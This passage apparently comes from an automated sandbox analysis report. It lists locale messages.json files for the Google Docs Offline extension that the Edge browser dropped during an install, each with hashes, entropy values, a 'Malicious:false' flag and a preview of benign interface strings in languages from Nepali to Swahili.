                                                                                                                                          Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1898
                                                                                                                                          Entropy (8bit):4.187050294267571
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                          MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                          SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                          SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                          SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):914
                                                                                                                                          Entropy (8bit):4.513485418448461
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                          MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                          SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                          SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                          SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):878
                                                                                                                                          Entropy (8bit):4.4541485835627475
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                          MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                          SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                          SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                          SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2766
                                                                                                                                          Entropy (8bit):3.839730779948262
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                          MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                          SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                          SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                          SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):978
                                                                                                                                          Entropy (8bit):4.879137540019932
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                          MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                          SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                          SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                          SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):907
                                                                                                                                          Entropy (8bit):4.599411354657937
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                          MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                          SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                          SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                          SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):914
                                                                                                                                          Entropy (8bit):4.604761241355716
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                          MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                          SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                          SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                          SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):937
                                                                                                                                          Entropy (8bit):4.686555713975264
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                          MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                          SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                          SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                          SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1337
                                                                                                                                          Entropy (8bit):4.69531415794894
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                          MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                          SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                          SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                          SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2846
                                                                                                                                          Entropy (8bit):3.7416822879702547
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                          MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                          SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                          SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                          SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):934
                                                                                                                                          Entropy (8bit):4.882122893545996
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                          MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                          SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                          SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                          SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):963
                                                                                                                                          Entropy (8bit):4.6041913416245
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                          MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                          SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                          SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                          SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1320
                                                                                                                                          Entropy (8bit):4.569671329405572
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                          MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                          SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                          SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                          SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):884
                                                                                                                                          Entropy (8bit):4.627108704340797
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                          MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                          SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                          SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                          SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):980
                                                                                                                                          Entropy (8bit):4.50673686618174
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                          MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                          SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
